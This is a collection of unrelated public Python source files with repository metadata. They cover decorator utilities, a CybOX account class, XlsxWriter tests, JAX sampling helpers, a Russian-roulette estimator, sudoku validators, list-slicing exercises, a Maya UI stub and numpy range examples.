ddd1182acc8cfe6354d08679ef6bae11022b4230
|
ffe1398a146312cc74189e529475e67ca0b0cd5c
|
refs/heads/master
| 2020-04-12T09:24:47.182655
| 2018-12-19T07:52:06
| 2018-12-19T07:52:06
| 162,401,727
| 0
| 0
|
Apache-2.0
| 2018-12-19T07:49:38
| 2018-12-19T07:49:37
| null |
UTF-8
|
Python
| false
| false
| 6,132
|
py
|
# -*- coding: utf-8 -*-
# File: argtools.py
import inspect
import six
from . import logger
if six.PY2:
import functools32 as functools
else:
import functools
__all__ = ['map_arg', 'memoized', 'memoized_method', 'graph_memoized', 'shape2d', 'shape4d',
'memoized_ignoreargs', 'log_once', 'call_only_once']
def map_arg(**maps):
"""
Apply a mapping on certain argument before calling the original function.
Args:
maps (dict): {argument_name: map_func}
"""
def deco(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if six.PY2:
argmap = inspect.getcallargs(func, *args, **kwargs)
else:
# getcallargs was deprecated since 3.5
sig = inspect.signature(func)
argmap = sig.bind_partial(*args, **kwargs).arguments
for k, map_func in six.iteritems(maps):
if k in argmap:
argmap[k] = map_func(argmap[k])
return func(**argmap)
return wrapper
return deco
memoized = functools.lru_cache(maxsize=None)
""" Alias to :func:`functools.lru_cache`
WARNING: memoization will keep keys and values alive!
"""
def graph_memoized(func):
"""
Like memoized, but keep one cache per default graph.
"""
# TODO it keeps the graph alive
import tensorflow as tf
GRAPH_ARG_NAME = '__IMPOSSIBLE_NAME_FOR_YOU__'
@memoized
def func_with_graph_arg(*args, **kwargs):
kwargs.pop(GRAPH_ARG_NAME)
return func(*args, **kwargs)
@functools.wraps(func)
def wrapper(*args, **kwargs):
assert GRAPH_ARG_NAME not in kwargs, "No Way!!"
graph = tf.get_default_graph()
kwargs[GRAPH_ARG_NAME] = graph
return func_with_graph_arg(*args, **kwargs)
return wrapper
_MEMOIZED_NOARGS = {}
def memoized_ignoreargs(func):
"""
A decorator. It performs memoization ignoring the arguments used to call
the function.
"""
def wrapper(*args, **kwargs):
if func not in _MEMOIZED_NOARGS:
res = func(*args, **kwargs)
_MEMOIZED_NOARGS[func] = res
return res
return _MEMOIZED_NOARGS[func]
return wrapper
def shape2d(a):
"""
Ensure a 2D shape.
Args:
a: a int or tuple/list of length 2
Returns:
list: of length 2. if ``a`` is a int, return ``[a, a]``.
"""
if type(a) == int:
return [a, a]
if isinstance(a, (list, tuple)):
assert len(a) == 2
return list(a)
raise RuntimeError("Illegal shape: {}".format(a))
def get_data_format(data_format, tfmode=True):
if tfmode:
dic = {'NCHW': 'channels_first', 'NHWC': 'channels_last'}
else:
dic = {'channels_first': 'NCHW', 'channels_last': 'NHWC'}
ret = dic.get(data_format, data_format)
if ret not in dic.values():
raise ValueError("Unknown data_format: {}".format(data_format))
return ret
def shape4d(a, data_format='channels_last'):
"""
Ensuer a 4D shape, to use with 4D symbolic functions.
Args:
a: a int or tuple/list of length 2
Returns:
list: of length 4. if ``a`` is a int, return ``[1, a, a, 1]``
or ``[1, 1, a, a]`` depending on data_format.
"""
s2d = shape2d(a)
if get_data_format(data_format) == 'channels_last':
return [1] + s2d + [1]
else:
return [1, 1] + s2d
@memoized
def log_once(message, func='info'):
"""
Log certain message only once. Call this function more than one times with
the same message will result in no-op.
Args:
message(str): message to log
func(str): the name of the logger method. e.g. "info", "warn", "error".
"""
getattr(logger, func)(message)
def call_only_once(func):
"""
Decorate a method or property of a class, so that this method can only
be called once for every instance.
Calling it more than once will result in exception.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = args[0]
# cannot use hasattr here, because hasattr tries to getattr, which
# fails if func is a property
assert func.__name__ in dir(self), "call_only_once can only be used on method or property!"
if not hasattr(self, '_CALL_ONLY_ONCE_CACHE'):
cache = self._CALL_ONLY_ONCE_CACHE = set()
else:
cache = self._CALL_ONLY_ONCE_CACHE
cls = type(self)
# cannot use ismethod(), because decorated method becomes a function
is_method = inspect.isfunction(getattr(cls, func.__name__))
assert func not in cache, \
"{} {}.{} can only be called once per object!".format(
'Method' if is_method else 'Property',
cls.__name__, func.__name__)
cache.add(func)
return func(*args, **kwargs)
return wrapper
def memoized_method(func):
"""
A decorator that performs memoization on methods. It stores the cache on the object instance itself.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = args[0]
assert func.__name__ in dir(self), "memoized_method can only be used on method!"
if not hasattr(self, '_MEMOIZED_CACHE'):
cache = self._MEMOIZED_CACHE = {}
else:
cache = self._MEMOIZED_CACHE
key = (func, ) + args[1:] + tuple(kwargs)
ret = cache.get(key, None)
if ret is not None:
return ret
value = func(*args, **kwargs)
cache[key] = value
return value
return wrapper
if __name__ == '__main__':
class A():
def __init__(self):
self._p = 0
@call_only_once
def f(self, x):
print(x)
@property
def p(self):
return self._p
@p.setter
@call_only_once
def p(self, val):
self._p = val
a = A()
a.f(1)
b = A()
b.f(2)
b.f(1)
print(b.p)
print(b.p)
b.p = 2
print(b.p)
b.p = 3
print(b.p)
|
[
"ppwwyyxxc@gmail.com"
] |
ppwwyyxxc@gmail.com
|
5b13733fd9888fea4a5dbbefc18f3413b70f4bec
|
75e84467a370b22aae4f30ab1fa7b42ccec9cb85
|
/cybox/objects/user_account_object.py
|
b25c7ea95eded4bb86a815050cbf12cda9073d4f
|
[
"BSD-3-Clause"
] |
permissive
|
cy-fir/python-cybox
|
cbe6eaafeac2a0dcb2ba06925ea72c3c44e29f42
|
292a378be5322032e8df0b9a110c2205b72aeee6
|
refs/heads/master
| 2020-12-31T03:36:26.544132
| 2016-01-22T22:05:25
| 2016-01-22T22:05:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,075
|
py
|
# Copyright (c) 2015, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
from mixbox import entities
from mixbox import fields
import cybox.bindings.user_account_object as user_account_binding
from cybox.common import DateTime, Duration, String
from cybox.objects.account_object import Account
class Group(entities.Entity):
"""An abstract class for account groups."""
def __init__(self):
raise TypeError("Cannot instantiate abstract type.")
class GroupList(entities.EntityList):
_binding = user_account_binding
_binding_class = user_account_binding.GroupListType
_binding_var = 'Group'
_contained_type = Group
_namespace = 'http://cybox.mitre.org/objects#UserAccountObject-2'
class Privilege(entities.Entity):
"""An abstract class for account privileges."""
def __init__(self):
raise TypeError("Cannot instantiate abstract type.")
class PrivilegeList(entities.EntityList):
_binding = user_account_binding
_binding_class = user_account_binding.PrivilegeListType
_binding_var = 'Privilege'
_contained_type = Privilege
_namespace = 'http://cybox.mitre.org/objects#UserAccountObject-2'
class UserAccount(Account):
_binding = user_account_binding
_binding_class = user_account_binding.UserAccountObjectType
_namespace = 'http://cybox.mitre.org/objects#UserAccountObject-2'
_XSI_NS = "UserAccountObj"
_XSI_TYPE = "UserAccountObjectType"
password_required = fields.TypedField('password_required')
full_name = fields.TypedField('Full_Name', String)
home_directory = fields.TypedField('Home_Directory', String)
last_login = fields.TypedField('Last_Login', DateTime)
script_path = fields.TypedField('Script_Path', String)
username = fields.TypedField('Username', String)
user_password_age = fields.TypedField('User_Password_Age', Duration)
# These should be overriden by subclasses
group_list = fields.TypedField('Group_List', GroupList)
privilege_list = fields.TypedField('Privilege_List', PrivilegeList)
|
[
"gback@mitre.org"
] |
gback@mitre.org
|
925fde5c4d36383db5a4ca3dd2f2a95b0eac5cd1
|
45de7d905486934629730945619f49281ad19359
|
/xlsxwriter/test/worksheet/test_write_sheet_view.py
|
80b851daa21e858de10d231daeeebed0d8042104
|
[
"BSD-2-Clause"
] |
permissive
|
jmcnamara/XlsxWriter
|
599e1d225d698120ef931a776a9d93a6f60186ed
|
ab13807a1be68652ffc512ae6f5791d113b94ee1
|
refs/heads/main
| 2023-09-04T04:21:04.559742
| 2023-08-31T19:30:52
| 2023-08-31T19:30:52
| 7,433,211
| 3,251
| 712
|
BSD-2-Clause
| 2023-08-28T18:52:14
| 2013-01-04T01:07:06
|
Python
|
UTF-8
|
Python
| false
| false
| 3,163
|
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2023, John McNamara, jmcnamara@cpan.org
#
import unittest
from io import StringIO
from ...worksheet import Worksheet
class TestWriteSheetView(unittest.TestCase):
"""
Test the Worksheet _write_sheet_view() method.
"""
def setUp(self):
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_write_sheet_view_tab_not_selected(self):
"""Test the _write_sheet_view() method. Tab not selected"""
self.worksheet._write_sheet_view()
exp = """<sheetView workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_tab_selected(self):
"""Test the _write_sheet_view() method. Tab selected"""
self.worksheet.select()
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines()"""
self.worksheet.select()
self.worksheet.hide_gridlines()
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines_0(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines(0)"""
self.worksheet.select()
self.worksheet.hide_gridlines(0)
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines_1(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines(1)"""
self.worksheet.select()
self.worksheet.hide_gridlines(1)
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines_2(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines(2)"""
self.worksheet.select()
self.worksheet.hide_gridlines(2)
self.worksheet._write_sheet_view()
exp = """<sheetView showGridLines="0" tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_row_col_headers(self):
"""Test the _write_sheet_views() method"""
self.worksheet.select()
self.worksheet.hide_row_col_headers()
self.worksheet._write_sheet_view()
exp = (
"""<sheetView showRowColHeaders="0" tabSelected="1" workbookViewId="0"/>"""
)
got = self.fh.getvalue()
self.assertEqual(got, exp)
|
[
"jmcnamara@cpan.org"
] |
jmcnamara@cpan.org
|
a753eac93c08765a0bdfa2dc047e3540b4c795b6
|
d7a73fdc2fa60a171d1b3ed3bbefe863c9351fab
|
/progen_transformer/utils.py
|
985f3b5fa667b37073c055c4d1b1786ddb90b702
|
[
"MIT"
] |
permissive
|
sailfish009/progen
|
e584d7352d8f89c7d72992c222ca888db7f28495
|
131320c67ed831aa812e58a4995d3414e458640f
|
refs/heads/main
| 2023-06-07T12:49:09.742045
| 2021-07-04T00:06:59
| 2021-07-04T00:06:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,477
|
py
|
import os, errno
from shutil import rmtree
from jax import random, nn, value_and_grad, vmap, pmap, jit, lax
from jax.lax import top_k
import jax.numpy as np
# helper functions
def exists(val):
return val is not None
def log(t, eps = 1e-20):
return np.log(t + eps)
def confirm(question):
while True:
resp = input(f'{question} (y/n) ')
lower_resp = resp.lower()
if lower_resp in ('y', 'n'):
return lower_resp == 'y'
def clear_directory_(path):
rmtree(str(path), ignore_errors = True)
path.mkdir(exist_ok = True, parents = True)
def silentremove(filename):
try:
os.remove(filename)
except OSError:
pass
# training functions
def cross_entropy(logits, targets, axis = -1, ignore_index = 0):
logprobs = nn.log_softmax(logits, axis = axis)
nll = np.take_along_axis(logprobs, np.expand_dims(targets, axis = axis), axis = axis)
# mask for loss is engineered so that it learns from the first padding token
# the padding token is reused as end-of-string for simplicity
mask = (targets != ignore_index)
eos_mask = (~mask).cumsum(axis = -1) == 1
mask = mask | eos_mask
ce = -np.mean(nll[mask])
return ce
def get_train_loss_fn(model, data_parallel = False):
map_fn = pmap if data_parallel else vmap
batch_model_apply = jit(map_fn(model.apply, in_axes = (None, None, 0), out_axes = 0))
@value_and_grad
def loss_fn(params, key, data):
inp, labels = data[:, :-1], data[:, 1:]
logits = batch_model_apply(params, key, inp)
return cross_entropy(logits, labels, axis = -1)
return loss_fn
# sampling functions
def select_top_k(tensor, k):
values, _ = top_k(tensor, k)
mask = tensor > values.min()
return mask, np.where(mask, tensor, 0.)
def gumbel_noise(rng, shape):
noise = random.uniform(rng, shape = shape, minval = 0., maxval = 1.)
return -log(-log(noise))
def sample(rng, fn, params, prime, length, top_k = None, add_bos = False):
start_pos = prime.shape[-1]
pad_right = length - prime.shape[-1]
padding = (0, pad_right) if not add_bos else (1, pad_right - 1)
seq = np.pad(prime, padding)
one_hots = np.eye(length, dtype = int)
for curr_pos in range(start_pos, length):
logits = fn(params, next(rng), seq)
logits = logits[curr_pos - 1]
noise = gumbel_noise(next(rng), logits.shape)
if exists(top_k):
mask, logits = select_top_k(logits, top_k)
noise *= mask
logits += noise
sampled_ind = np.argmax(logits, axis = -1)
one_hot = one_hots[curr_pos]
seq += one_hot * sampled_ind
# for now, just set everything after second padding token (eos) to padding
remove_after_eos_mask = (seq == 0).cumsum(axis = -1) > 1
seq *= ~remove_after_eos_mask
return seq
# rng hacks
def hardware_uniform(
rng_key,
shape,
dtype = np.float32,
minval = np.float32(0),
maxval = np.float32(1)
):
del rng_key
minval = lax.convert_element_type(minval, dtype)
maxval = lax.convert_element_type(maxval, dtype)
return lax.rng_uniform(minval, maxval, shape)
def hardware_bernoulli(rng_key, p = np.float32(0.5), shape = None):
del rng_key
return lax.rng_uniform(0.0, 1.0, shape) < p
def set_hardware_rng_(jax):
jax.random.bernoulli = hardware_bernoulli
jax.random.uniform = hardware_uniform
jax._src.random.uniform = hardware_uniform
|
[
"lucidrains@gmail.com"
] |
lucidrains@gmail.com
|
09f225cdf22472b45c1d1f9d140bd0d5ee2c897f
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Scripts/Lazymux/routersploit/routersploit/modules/creds/cameras/honeywell/ssh_default_creds.py
|
6477710e7ac7b6aa711f719e0a907bb616b6175d
|
[] |
no_license
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:39364c7930721e7cc70c7da8107affc5b3e0356146825b0ee4d41d5a6b47b20f
size 858
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
6d4d9a6b5cf7732ea1bdc9a1514340ec7eafad4d
|
0a9e72d2527a2d82086b8c56ef23c9e9903e3da3
|
/russian_roulette/RussianRoulette.py
|
d0c2ba3861197b9d51598f15d79a22c7e5a55170
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] |
permissive
|
karlnapf/ozone-roulette
|
6bfcab10dee8b9dd95833bd15c1a3702c2f9769e
|
df99b11c3b00a27440b094427d485b2fea858903
|
refs/heads/master
| 2021-01-01T05:30:21.389668
| 2015-02-03T09:09:40
| 2015-02-03T09:10:01
| 12,896,509
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,664
|
py
|
from abc import abstractmethod
from numpy.lib.function_base import delete
from numpy.ma.core import mean, zeros, log, arange, std
from numpy.random import permutation, rand
import logging
class RussianRoulette(object):
def __init__(self, threshold, block_size=1):
self.threshold = threshold
self.block_size = block_size
@abstractmethod
def get_estimate(self, estimates, index):
start_idx = index * self.block_size
stop_idx = index * self.block_size + self.block_size
# if there are enough samples, use them, sub-sample if not
if stop_idx <= len(estimates):
logging.debug("Averaging over %d samples from index %d to %d" %
(self.block_size, start_idx, stop_idx))
indices = arange(start_idx, stop_idx)
else:
logging.debug("Averaging over a random subset of %d samples" %
self.block_size)
indices = permutation(len(estimates))[:self.block_size]
return mean(estimates[indices])
def exponential(self, estimates):
logging.debug("Entering")
# find a strict lower bound on the estimates and remove it from list
bound = estimates.min()
bound_idx = estimates.argmin()
estimates = delete(estimates, bound_idx)
estimates = estimates - bound
# find an integer close to the mean of the transformed estimates and divide
E = max(int(round(abs(mean(estimates)))), 1)
estimates = estimates / E
logging.info("Using %f as lower bound on estimates" % bound)
logging.info("Computing product of E=%d RR estimates" % E)
logging.info("Std-deviation after scaling is %f" % std(estimates))
# index for iterating through the used estimates
# (might be averaged, so might be lower than the number of available estimates
# if the block size is greater than one
estimate_idx = 0
samples = zeros(E)
for iteration in range(E):
weight = 1
# start with x^0 which is 1
samples[iteration] = 1
term = 1
# index for computed samples
series_term_idx = 1
while weight > 0:
# update current term of infinite series
# average over block
x_inner = self.get_estimate(estimates, estimate_idx)
term *= (x_inner / series_term_idx)
# if summation has reached threshold, update weights
if abs(term) < self.threshold:
q = term / self.threshold
if rand() < q:
# continue and update weight
weight = weight / q
else:
# stop summation
weight = 0
samples[iteration] += weight * term;
estimate_idx += 1
series_term_idx += 1
logging.info("RR estimate %d/%d with threshold %.2f is %.4f and took %d series terms" %
(iteration + 1, E, self.threshold, samples[iteration], series_term_idx))
# now put things together. Note that samples contains an unbiased estimate
# which might be quite small. However, due to the removal of the bound,
# this will not cause an underflow and we can just take the log.
logging.debug("Leaving")
return bound + sum(log(samples));
|
[
"heiko.strathmann@gmail.com"
] |
heiko.strathmann@gmail.com
|
5e392dbeec98a689c52d64e02a4d0985d70efdef
|
8afb5afd38548c631f6f9536846039ef6cb297b9
|
/_MY_ORGS/Web-Dev-Collaborative/blog-research/Data-Structures/1-Python/matrix/sudoku_validator.py
|
7bda6e4241502010a2301498fe39b6c447b205d9
|
[
"MIT"
] |
permissive
|
bgoonz/UsefulResourceRepo2.0
|
d87588ffd668bb498f7787b896cc7b20d83ce0ad
|
2cb4b45dd14a230aa0e800042e893f8dfb23beda
|
refs/heads/master
| 2023-03-17T01:22:05.254751
| 2022-08-11T03:18:22
| 2022-08-11T03:18:22
| 382,628,698
| 10
| 12
|
MIT
| 2022-10-10T14:13:54
| 2021-07-03T13:58:52
| null |
UTF-8
|
Python
| false
| false
| 2,478
|
py
|
"""
Write a function validSolution/ValidateSolution/valid_solution() that accepts a 2D array representing a Sudoku board, and returns true if it is a valid solution, or false otherwise. The cells of the sudoku board may also contain 0's, which will represent empty cells. Boards containing one or more zeroes are considered to be invalid solutions.
The board is always 9 cells by 9 cells, and every cell only contains integers from 0 to 9.
(More info at: http://en.wikipedia.org/wiki/Sudoku)
"""
# Using dict/hash-table
from collections import defaultdict
def valid_solution_hashtable(board):
for i in range(len(board)):
dict_row = defaultdict(int)
dict_col = defaultdict(int)
for j in range(len(board[0])):
value_row = board[i][j]
value_col = board[j][i]
if not value_row or value_col == 0:
return False
if value_row in dict_row:
return False
else:
dict_row[value_row] += 1
if value_col in dict_col:
return False
else:
dict_col[value_col] += 1
for i in range(3):
for j in range(3):
grid_add = 0
for k in range(3):
for l in range(3):
grid_add += board[i*3+k][j*3+l]
if grid_add != 45:
return False
return True
# Without hash-table/dict
def valid_solution(board):
correct = [1, 2, 3, 4, 5, 6, 7, 8, 9]
# check rows
for row in board:
if sorted(row) != correct:
return False
# check columns
for column in zip(*board):
if sorted(column) != correct:
return False
# check regions
for i in range(3):
for j in range(3):
region = []
for line in board[i*3:(i+1)*3]:
region += line[j*3:(j+1)*3]
if sorted(region) != correct:
return False
# if everything correct
return True
# Using set
def valid_solution_set (board):
valid = set(range(1, 10))
for row in board:
if set(row) != valid:
return False
for col in [[row[i] for row in board] for i in range(9)]:
if set(col) != valid:
return False
for x in range(3):
for y in range(3):
if set(sum([row[x*3:(x+1)*3] for row in board[y*3:(y+1)*3]], [])) != valid:
return False
return True
|
[
"bryan.guner@gmail.com"
] |
bryan.guner@gmail.com
|
542a65e7cf0987e43c313ec125817c182f6c4308
|
e66eb0234d09b732b52c839058a830bee486fd30
|
/list_operations.py
|
6e136a5fe261e154cc5ab0633b4d3bcc537ce7b0
|
[] |
no_license
|
nt-git/list-slicing
|
44d10c350b0e0248cfcc18cf795bab07bb5f4a5b
|
5f8a8290a4b040bef1ddbfe7b6e559a46d01f67e
|
refs/heads/master
| 2021-05-14T13:08:26.640954
| 2018-01-05T21:08:11
| 2018-01-05T21:08:11
| 116,427,201
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,306
|
py
|
"""Functions that manipulate lists without using Python's built-in list methods.
The fundamental operations on lists in Python are those that are part of the
language syntax and/or cannot be implemented in terms of other list operations.
They include:
* List indexing (some_list[index])
* List indexing assignment (some_list[index] = value)
* List slicing (some_list[start:end])
* List slicing assignment (some_list[start:end] = another_list)
* List index deletion (del some_list[index])
* List slicing deletion (del some_list[start:end])
Implement functions that each use just one of the above operations.
The docstring of each function describes what it should do.
DO NOT USE ANY OF THE BUILT IN LIST METHODS, OR len()!
"""
def head(input_list):
"""Return the first element of the input list.
For example:
>>> head(['Jan', 'Feb', 'Mar'])
'Jan'
"""
return input_list[0]
def tail(input_list):
"""Return all elements of the input list except the first.
For example:
>>> tail(['Jan', 'Feb', 'Mar'])
['Feb', 'Mar']
"""
return input_list[1:]
def last(input_list):
"""Return the last element of the input list.
For example:
>>> last(['Jan', 'Feb', 'Mar'])
'Mar'
"""
return input_list[-1]
def init(input_list):
"""Return all elements of the input list except the last.
For example:
>>> init(['Jan', 'Feb', 'Mar'])
['Jan', 'Feb']
"""
return input_list[:-1]
##############################################################################
# Do yourself a favor and get a short code review here.
def first_three(input_list):
"""Return the first three elements of the input list.
For example:
>>> first_three(['Jan', 'Feb', 'Mar', 'Apr', 'May'])
['Jan', 'Feb', 'Mar']
"""
return input_list[0:3]
def last_five(input_list):
"""Return the last five elements of the input list.
For example:
>>> last_five([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[15, 18, 21, 24, 27]
"""
return input_list[-5:]
def middle(input_list):
"""Return all elements of input_list except the first two and the last two.
For example:
>>> middle([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[6, 9, 12, 15, 18, 21]
"""
return input_list[2:-2]
def inner_four(input_list):
"""Return the third, fourth, fifth, and sixth elements of input_list.
For example:
>>> inner_four([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[6, 9, 12, 15]
"""
return input_list[2:6]
def inner_four_end(input_list):
"""Return the elements that are 6th, 5th, 4th, and 3rd from the end of input_list.
This function should return those elements in a list, in the exact order
described above.
For example:
>>> inner_four_end([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[12, 15, 18, 21]
"""
return input_list[-6:-2]
def replace_head(input_list):
"""Replace the head of input_list with the value 42 and return nothing.
For example:
>>> multiples = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27]
>>> replace_head(multiples)
>>> multiples == [42, 3, 6, 9, 12, 15, 18, 21, 24, 27]
True
"""
input_list[0] = 42
return
def replace_third_and_last(input_list):
"""Replace third and last elements of input_list with 37 and return nothing.
For example:
>>> multiples = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27]
>>> replace_third_and_last(multiples)
>>> multiples == [0, 3, 37, 9, 12, 15, 18, 21, 24, 37]
True
"""
input_list[2] = 37
input_list[-1] = 37
return
def replace_middle(input_list):
"""Replace all elements of a list but the first and last two with 42 and 37.
After the replacement, 42 and 37 should appear in that order in input_list.
Return nothing.
For example:
>>> multiples = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27]
>>> replace_middle(multiples)
>>> multiples == [0, 3, 42, 37, 24, 27]
True
"""
input_list[2:-2] = [42, 37]
return
def delete_third_and_seventh(input_list):
"""Remove third and seventh elements of input_list and return nothing.
For example:
>>> notes = ['Do', 'Re', 'Mi', 'Fa', 'So', 'La', 'Ti', 'Do']
>>> delete_third_and_seventh(notes)
>>> notes == ['Do', 'Re', 'Fa', 'So', 'La', 'Do']
True
"""
del input_list[2]
del input_list[5]
return
def delete_middle(input_list):
"""Remove all elements from input_list except the first two and last two.
Return nothing.
For example:
>>> notes = ['Do', 'Re', 'Mi', 'Fa', 'So', 'La', 'Ti', 'Do']
>>> delete_middle(notes)
>>> notes == ['Do', 'Re', 'Ti', 'Do']
True
"""
while len(input_list) > 4 :
input_list.pop(2)
return
##############################################################################
# END OF MAIN EXERCISE. Yay! You did it! You Rock!
#
# Please ask for a code review from an Education team member before proceeding.
##############################################################################
# This is the part were we actually run the doctests.
if __name__ == "__main__":
import doctest
result = doctest.testmod()
if result.failed == 0:
print "ALL TESTS PASSED"
|
[
"no-reply@hackbrightacademy.com"
] |
no-reply@hackbrightacademy.com
|
5e10aabc613ae7de645ef94312a9a1bc985b98cf
|
aa0366a8632f334fb35e6bdc78717f3456202eb7
|
/bp/characterKit.py
|
21b2ade02cf6076383350c1d725ab0a82e74ea12
|
[] |
no_license
|
Mortaciunea/bdScripts
|
0891478096f3a5876655896c9649c0a7204d5ee8
|
4f6e9d2b181bb4a90c1ccfcaca64c22ecbe0dd59
|
refs/heads/master
| 2020-12-24T13:36:57.930038
| 2015-09-03T16:03:46
| 2015-09-03T16:03:46
| 41,869,547
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,057
|
py
|
import pymel.core as pm
import pymel.core.datatypes as dt
import re,os,shutil,glob
import logging
import shiboken
import PySide.QtGui as QtGui
import PySide.QtCore as QtCore
import maya.OpenMayaUI
def get_maya_window():
maya_window_util = maya.OpenMayaUI.MQtUtil.mainWindow()
maya_window = shiboken.wrapInstance( long( maya_window_util ), QtGui.QWidget )
return maya_window
characterKitWin = 'characterKitWindow'
class CharacterKitUI(QtGui.QMainWindow):
def __init__(self,parent=get_maya_window()):
if pm.window( characterKitWin, exists = True, q = True ):
pm.deleteUI( characterKitWin)
super(CharacterKitUI,self).__init__(parent)
self.setObjectName(characterKitWin)
self.setWindowTitle('Character Kit 2.1')
centralWidget = QtGui.QWidget()
mainLayout = QtGui.QVBoxLayout()
leftSideListsLSplitter = QtGui.QSplitter(QtCore.Qt.Vertical)
rightSideListsLSplitter = QtGui.QSplitter(QtCore.Qt.Horizontal)
#left side lists
#characters list
self.charactersList = QtGui.QListView()
#skins list
self.skinsList = QtGui.QListView()
#body parts list
self.bodyPartsList = QtGui.QListView()
leftSideListsLSplitter.addWidget(self.charactersList)
leftSideListsLSplitter.addWidget(self.skinsList)
leftSideListsLSplitter.addWidget(self.bodyPartsList)
mainLayout.addWidget(leftSideListsLSplitter)
centralWidget.setLayout(mainLayout)
self.setCentralWidget(centralWidget)
#menu bar
self.addMenu()
self.show()
self.resize(860,600)
def addMenu(self):
self.menuBar = self.menuBar()
self.fileMenu = self.menuBar.addMenu('File')
self.fileMenu.addAction('Load skeleton')
self.fileMenu.addAction('Save skeleton')
self.toolsMenu = self.menuBar.addMenu('Tools')
self.toolsMenu.addAction('Create Picking Geometry')
|
[
"ender_bd@yahoo.com"
] |
ender_bd@yahoo.com
|
400ddf4c1c830f1adf3d42e1f2ef065c19735ef2
|
b08b373d78fb42dbb11aebeadf71168dc6476696
|
/pycharm_programs/mme-methods/henbgw_count.py
|
d84e97c0fedf37a1d818f56f5e2f6731fc524b0b
|
[] |
no_license
|
lajapathy/python-practice
|
40a44a026546d1f3414452a99a68487a14df3c02
|
869a59cad89077327bb8117c34801af985a63e0d
|
refs/heads/master
| 2022-02-25T14:59:52.155959
| 2019-09-24T07:16:58
| 2019-09-24T07:16:58
| 121,089,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 950
|
py
|
import re
def henbgw_count(self):
for chassis in self.get_dut_list():
config_lines = self._send(["show config"], chassis)
henbgw_mgmt_db_name_from_config = ''
henbgw_mgmt_db_name_from_cli_output = ''
for line in config_lines:
if "associate henbgw-mgmt-db" in line:
henbgw_mgmt_db_name_from_config = re.match('\s*associate henbgw-mgmt-db\s*(.*)\s*',line).group(1)
break
cli_output = self._send(["show lte-policy mme henbgw mgmt-db summary"], chassis)
for line in cli_output:
if "HenbGW Management DB" in line:
henbgw_mgmt_db_name_from_cli_output = re.match('\s*HenbGW Management DB\s*(.*)\s*',line).group(1)
break
if henbgw_mgmt_db_name_from_cli_output != henbgw_mgmt_db_name_from_config:
return SystestResult(1, henbgw_mgmt_db_name_from_cli_output)
#Now, we verify henbgw count
|
[
"lamadhus@cisco.com"
] |
lamadhus@cisco.com
|
0dc4c9fb7b5faa84b43a579fbd289c735ff7794f
|
8fd92c0a65c9b3e3912b6e8ef043656ee225880a
|
/EXAMPLES/np_create_ranges.py
|
e1aa89ab7ab9a7f0785f17f77b6c152021baa25a
|
[] |
no_license
|
waiteb15/py3forsci3day
|
9fbcbb59f1c14f3d91cb2599d7ca8b4d6ac628c4
|
fc664042618f0910d40e85677a2438eef5cce2b7
|
refs/heads/master
| 2020-04-25T11:24:18.697218
| 2019-02-28T23:40:52
| 2019-02-28T23:40:52
| 172,743,315
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 347
|
py
|
#!/usr/bin/env python
import numpy as np
r1 = np.arange(50)
print(r1)
print("size is", r1.size)
print()
r2 = np.arange(5,101,5)
print(r2)
print("size is", r2.size)
print()
r3 = np.arange(1.0,5.0,.3333333)
print(r3)
print("size is", r3.size)
print()
r4 = np.linspace(1.0, 5.0, 7)
print(r4)
print("size is", r4.size)
print()
|
[
"waiteb15@gmail.com"
] |
waiteb15@gmail.com
|
